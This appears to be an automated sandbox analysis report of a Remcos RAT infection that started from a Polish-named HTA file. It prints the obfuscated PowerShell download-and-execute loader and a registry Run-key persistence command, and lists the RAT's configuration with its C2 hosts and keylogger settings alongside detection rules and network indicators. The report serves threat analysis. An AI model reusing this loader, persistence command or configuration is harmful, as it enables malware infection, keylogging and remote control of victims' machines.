              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic; $Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){. ($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1 arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage GonrSk b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol 1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . MardSkufw Lemp Pos ';$Burgessdom=Bortledede 'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi ';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\ CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase ');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora ');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvnlRaci:MorbDSmotiT pmsCplfpW seoUro.n Tope SkanStyrtFlyvetrskn Anch .reeFormdpappeUplenF ld=St,t$.mlgRMenieMi.enAmazp Ar,rgr niAmphsKrydeKug.nT,ng. mpsThrip Undl SeciPondtAf k(Spat$Rre.B KakuReflrKonsg .aleSi.asFa csBerrdSlanos,olmIsol),iat ');$Renprisen=$Disponentenheden[0];Oraklerne (Bortledede 'Ma t$Cherg SpalC.unoN.nebPrecaT.pclstoc:ForfSLevetFortaPrist KriiTitasForetUndei Chik BileXer,rO.ersGadm=NoniN SoreAutow,tan-UmagOMis.bloddj,tole .ufc BiltVill ReidSHotby emos ectunineCocomV.ka.AescNHalveFngstOmph.UnwiWSu,meS.yrbTetrCSlublDrggiJu teShunnFundtOver ');Oraklerne (Bortledede ' Spe$ BasSTr
              Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 8024, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)", ProcessId: 7252, ProcessName: cmd.exe
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7492, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Straddlers
              Sigma detected: Direct Autorun Keys Modification
              Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7252, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)", ProcessId: 7492, ProcessName: reg.exe
              Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 8024, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)", ProcessId: 7252, ProcessName: cmd.exe
              Sigma detected: Suspicious Powershell In Registry Run Keys
              Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: %Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7492, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Straddlers
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic; $Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){. ($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1 arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage GonrSk b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol 1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . MardSkufw Lemp Pos ';$Burgessdom=Bortledede 'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi ';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\ CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase ');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora ');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvnlRaci:MorbDSmotiT pmsCplfpW seoUro.n Tope SkanStyrtFlyvetrskn Anch .reeFormdpappeUplenF ld=St,t$.mlgRMenieMi.enAmazp Ar,rgr niAmphsKrydeKug.nT,ng. mpsThrip Undl SeciPondtAf k(Spat$Rre.B KakuReflrKonsg .aleSi.asFa csBerrdSlanos,olmIsol),iat ');$Renprisen=$Disponentenheden[0];Oraklerne (Bortledede 'Ma t$Cherg SpalC.unoN.nebPrecaT.pclstoc:ForfSLevetFortaPrist KriiTitasForetUndei Chik BileXer,rO.ersGadm=NoniN SoreAutow,tan-UmagOMis.bloddj,tole .ufc BiltVill ReidSHotby emos ectunineCocomV.ka.AescNHalveFngstOmph.UnwiWSu,meS.yrbTetrCSlublDrggiJu teShunnFundtOver ');Oraklerne (Bortledede ' Spe$ BasSTr
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1308, ProcessName: svchost.exe

              Snort Signatures

              No Snort rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
              Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
              Source: jgbours284hawara01.duckdns.orgAvira URL Cloud: Label: malware
              Found malware configuration
              Source: 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "jgbours284hawara01.duckdns.org:3050:0jgbours284hawara01.duckdns.org:3051:1jgbours284hawara02.duckdns.org:3050:0", "Assigned name": "Protected", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jnbcourg-8XH6PE", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mvourhjs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Multi AV Scanner detection for submitted file
              Source: PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaReversingLabs: Detection: 54%
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 8024, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED
              Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49727 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.5:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.5:49734 version: TLS 1.2
              Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000005.00000002.2590121491.000000000831A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2587009002.0000000007134000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbw source: powershell.exe, 00000005.00000002.2587009002.00000000071A8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: notepad.pdbGCTL source: mshta.exe, 00000000.00000003.1998389233.0000000008651000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1995220103.00000000085CD000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.2587009002.0000000007146000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000005.00000002.2587009002.00000000071A8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbeKug source: powershell.exe, 00000005.00000002.2587009002.00000000071A8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2576907258.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2576907258.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22C910F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,10_2_22C910F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22C96580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,10_2_22C96580
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040AE51 FindFirstFileW,FindNextFileW,16_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,19_2_00407EF8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,22_2_00407898

              Networking

              barindex
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: jgbours284hawara01.duckdns.org
              Uses dynamic DNS services
              Source: unknownDNS query: name: jgbours284hawara01.duckdns.org
              Source: unknownDNS query: name: jgbours284hawara02.duckdns.org
              Source: global trafficTCP traffic: 192.168.2.5:49731 -> 45.88.90.110:3050
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 45.88.90.110 45.88.90.110
              Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
              Source: Joe Sandbox ViewIP Address: 87.121.105.163 87.121.105.163
              Source: Joe Sandbox ViewASN Name: LVLT-10753US LVLT-10753US
              Source: Joe Sandbox ViewASN Name: WOWUS WOWUS
              Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
              Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
              Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49727 version: TLS 1.0
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGMiZy7EGIjBhRj7IuadU0gbq76nmijOz5rJlabhPhKgsZ7QxpWJU2pGaolQtvo8xHffhXVqTQ4YyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-01-23; NID=513=Q1QUuPoP5fiffsxnHX7HU6RtQBqmxviW_6ILXd3jNP98QQJCtzR2tDO3F5Bby44iwt6_E-RtM3O0KyBD8u8pVVmpfkL9O1UQZs-wW6FMNXT1Xn-HjQtRaldRTuZ5l3PDmgoOX2iKCv2sE_S80s-0l_WPRIMsOB_cq-G9-m46R4o
              Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGMiZy7EGIjA7qK4Mr9pBN6mKzvK2lTskjhTK6lIPUikSw97szio8blseDN54zxFJKYhz_ihMLFIyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-01-23; NID=513=Q1QUuPoP5fiffsxnHX7HU6RtQBqmxviW_6ILXd3jNP98QQJCtzR2tDO3F5Bby44iwt6_E-RtM3O0KyBD8u8pVVmpfkL9O1UQZs-wW6FMNXT1Xn-HjQtRaldRTuZ5l3PDmgoOX2iKCv2sE_S80s-0l_WPRIMsOB_cq-G9-m46R4o
              Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=4LRrbP6CoH7uBLr&MD=X1ONPB1b HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
